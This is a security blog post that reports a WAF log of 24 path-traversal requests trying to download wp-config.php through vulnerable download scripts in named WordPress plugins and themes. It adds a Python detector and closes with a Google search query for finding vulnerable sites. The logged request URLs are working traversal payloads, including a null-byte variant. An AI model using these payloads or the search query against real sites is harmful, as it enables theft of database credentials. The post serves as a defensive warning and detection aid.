Dangerous WP plugins and themes: WAF logs of illicit wp-config.php downloads

I am reporting this because my WAF detected attacks trying to hack wp-config.php.
The domain has been masked.

If a plugin with an insecure download feature is installed on the server, wp-config.php can be stolen through it.
All of these are quite old plugins that have already been withdrawn from distribution, but anyone who still has them installed should take care.

The themes are probably ones nobody in Japan uses, but if a theme contains a file like download.php, it may be worth replacing it.

WP Vault – WordPress plugin | WordPress.org
https://wordpress.org/plugins/wp-vault/
1 2018/12/12 06:11:11 xxx.jp/?wpv-image=../wp-config.php 109.120.167.1
wordpress-wpconfig

WordPress Plugin ShortCode 0.2.3 – Local File Inclusion
2 2018/12/12 06:11:11 xxx.jp/wp-content/force-download.php?file=../wp-config.php 109.120.167.1
wordpress-wpconfig

Advanced uploader
3 2018/12/12 06:11:12 xxx.jp/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00 109.120.167.1
traversal-1

http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
4 2018/12/12 06:11:13 xxx.jp/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php 109.120.167.1
wordpress-wpconfig

CodeArt – Google MP3 Player – WordPress plugin | WordPress.org
https://wordpress.org/plugins/google-mp3-audio-player/
5 2018/12/12 06:11:14 xxx.jp/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php 109.120.167.1
wordpress-wpconfig

WP Custom Pages – WordPress plugin | WordPress.org
WordPress Plugin Custom Pages 0.5.0.1 – Local File Inclusion
6 2018/12/12 06:11:18 xxx.jp/wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php 109.120.167.1
wordpress-wpconfig

7 2018/12/12 06:11:21 xxx.jp/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php 109.120.167.1
wordpress-wpconfig
8 2018/12/12 06:11:22 xxx.jp/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
9 2018/12/12 06:11:23 xxx.jp/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php 109.120.167.1
wordpress-wpconfig
10 2018/12/12 06:11:23 xxx.jp/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php 109.120.167.1
wordpress-wpconfig
11 2018/12/12 06:11:24 xxx.jp/wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
12 2018/12/12 06:11:25 xxx.jp/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
13 2018/12/12 06:11:26 xxx.jp/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
14 2018/12/12 06:11:26 xxx.jp/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
15 2018/12/12 06:11:27 xxx.jp/wp-content/themes/epic/includes/download.php?file=wp-config.php 109.120.167.1
wordpress-wpconfig
16 2018/12/12 06:11:28 xxx.jp/wp-content/themes/felis/download.php?file=../wp-config.php 109.120.167.1
wordpress-wpconfig
17 2018/12/12 06:11:28 xxx.jp/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
18 2018/12/12 06:11:29 xxx.jp/wp-content/themes/lote27/download.php?download=../../../wp-config.php 109.120.167.1
wordpress-wpconfig
19 2018/12/12 06:11:29 xxx.jp/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
20 2018/12/12 06:11:30 xxx.jp/wp-content/themes/markant/download.php?file=../../wp-config.php 109.120.167.1
wordpress-wpconfig
21 2018/12/12 06:11:31 xxx.jp/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
22 2018/12/12 06:11:31 xxx.jp/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php 109.120.167.1
wordpress-wpconfig
23 2018/12/12 06:11:32 xxx.jp/wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php 109.120.167.1
wordpress-wpconfig
24 2018/12/12 06:11:33 xxx.jp/wp-content/themes/yakimabait/download.php?file=./wp-config.php 109.120.167.1
wordpress-wpconfig
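
As an added example that is not part of the original post, the following Python detector parses WAF lines in the format shown above and tags any request whose query parameters carry `../` or name wp-config.php, including the null-byte and URL-encoded variants seen in the log; the host and client addresses in the sample lines are constructed.

```python
"""Flag WAF log lines in which wp-config.php is pulled through a download-style script.
Added example, not the post's code. Assumed line layout (matches the post):
  <seq> <YYYY/MM/DD> <HH:MM:SS> <host>/<path>?<query> <client-ip>"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(r"^(\d+)\s+(\S+ \S+)\s+(\S+)\s+(\S+)$")

# Constructed sample lines in the post's format (fake host, TEST-NET client addresses).
SAMPLE_LOG = """\
1 2018/12/12 06:11:11 example.jp/?wpv-image=../wp-config.php 198.51.100.7
2 2018/12/12 06:11:12 example.jp/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00 198.51.100.7
3 2018/12/12 06:11:13 example.jp/wp-content/themes/epic/includes/download.php?file=wp-config.php 198.51.100.7
4 2018/12/12 06:11:14 example.jp/wp-content/themes/felis/download.php?file=%252e%252e%252fwp-config.php 198.51.100.7
5 2018/12/12 06:11:15 example.jp/wp-content/themes/felis/download.php?file=brochure.pdf 203.0.113.9
"""

def normalize(value: str) -> str:
    """Undo a second encoding layer, drop NUL truncation bytes, unify slashes, lowercase."""
    return unquote(value).replace("\x00", "").replace("\\", "/").lower()

def classify(url: str) -> List[str]:
    """Tags for one host/path?query string; every query parameter value is inspected."""
    tags = set()
    for _, raw in parse_qsl(urlsplit("http://" + url).query, keep_blank_values=True):
        val = normalize(raw)  # parse_qsl decoded once; normalize catches %252e-style doubles
        if "../" in val:
            tags.add("traversal")
        if "wp-config.php" in val:
            tags.add("wordpress-wpconfig")
    return sorted(tags)

def parse_line(line: str) -> Optional[Dict]:
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    seq, ts, url, ip = m.groups()
    return {"seq": int(seq), "ts": ts, "url": url, "ip": ip, "tags": classify(url)}

def scan(lines) -> List[Dict]:
    """Keep only records that carry at least one tag."""
    return [r for r in map(parse_line, lines) if r and r["tags"]]

def hits_per_ip(records) -> Dict[str, int]:
    """Flagged requests per client: one address hitting many scripts in seconds is a scanner."""
    counts: Dict[str, int] = {}
    for r in records:
        counts[r["ip"]] = counts.get(r["ip"], 0) + 1
    return counts
```

Running `scan(SAMPLE_LOG.splitlines())` flags lines 1 to 4 and leaves the legitimate brochure download alone; `hits_per_ip` then shows the single client behind all four, the same pattern as the 24 requests in 22 seconds above.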

For example, searching Google for
Index of themes/yakimabait/download.php – Google Search
brings up sites that are targets of this attack.